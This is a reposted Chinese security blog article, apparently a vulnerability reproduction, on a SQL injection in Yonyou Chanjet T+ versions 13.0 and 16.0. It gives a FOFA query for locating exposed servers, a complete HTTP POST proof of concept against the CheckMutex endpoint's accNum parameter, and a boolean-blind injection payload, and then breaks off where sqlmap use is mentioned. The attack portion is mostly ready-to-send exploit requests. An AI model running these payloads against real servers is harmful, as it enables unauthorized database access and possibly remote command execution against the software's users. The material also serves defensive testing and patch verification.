专栏名称: 衡阳信安
船山院士网络安全团队唯一公众号,为国之安全而奋斗,为信息安全而发声!
目录
相关文章推荐
程序员的那些事  ·  成人玩偶 + ... ·  2 天前  
德大器械注册与临床  ·  【知识分享】医疗器械委托生产管理难点 ·  2 天前  
第十一诊室  ·  这样的化妆品早就过期了,很多姑娘还在用! ·  2 天前  
解螺旋  ·  刚刚!中科院博士实验资料包遭泄露,高产SCI ... ·  4 天前  
丁香园  ·  不上夜班还双休?医生:在这工作,请假就批! ·  3 天前  
51好读  ›  专栏  ›  衡阳信安

用友畅捷通T+ 前台SQL注入漏洞复现

衡阳信安  · 公众号  ·  · 2024-07-26 00:00

正文

漏洞描述

畅捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。

影响范围

畅捷通T+ 13.0
畅捷通T+ 16.0

漏洞复现

fofa语法: app="畅捷通-TPlus"

poc 

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: HOST=null; ASP.NET_SessionId=bckreyoztu1sja1ilfzuovdp; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721710682; HMACCOUNT=825944B188852EE4; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721711134
If-None-Match: W/"5cdcb35e-77df"
If-Modified-Since: Thu, 16 May 2019 00:48:30 GMT
Connection: close
Content-Length: 57

{"accNum": "6'", "functionTag": "SYS0104", "url": ""}

发现accNum参数处加单引号会出现数据库报错,出现这种情况,一般存在SQL注入。
构造布尔盲注payload 

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: HOST=null; ASP.NET_SessionId=bckreyoztu1sja1ilfzuovdp; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721710682; HMACCOUNT=825944B188852EE4; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721711134
If-None-Match: W/"5cdcb35e-77df"
If-Modified-Since: Thu, 16 May 2019 00:48:30 GMT
Connection: close
Content-Length: 250

{"accNum": "3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab", "functionTag": "SYS0104", "url": ""}

编写了一个带有子查询的sql语句,通过判断5227是否等于5227,来构造一个布尔查询,如果返回真,即返回字符1,否则返回字符0

接下来直接使用sqlmap一把梭验证一下。







请到「今天看啥」查看全文


推荐文章
程序员的那些事  ·  成人玩偶 + DeepSeek等大模型杀疯啦!中国制造的王炸组合,彻底征服欧美宅男
2 天前
德大器械注册与临床  ·  【知识分享】医疗器械委托生产管理难点
2 天前
第十一诊室  ·  这样的化妆品早就过期了,很多姑娘还在用!
2 天前
解螺旋  ·  刚刚!中科院博士实验资料包遭泄露,高产SCI秘密曝光!
4 天前
丁香园  ·  不上夜班还双休?医生:在这工作,请假就批!
3 天前
点点星光  ·  ♬《心里梦里都是你》,送给牵挂思念的你!
7 年前
吉他谱  ·  【吉他谱】伍佰演唱会版视频《白鸽》
7 年前
雷峰网  ·  业界 | 百度双管齐下 两大核心生态带动未来增长
7 年前
创业投资最前线  ·  又是德国造!2个车位,却能停15辆车
7 年前
EasyCharts  ·  10步搞定双坐标折线图
7 年前
Sov5搜索   ·   小百科   ·   今天看啥   ·   移动版
51好读 - 好文章就要读起来!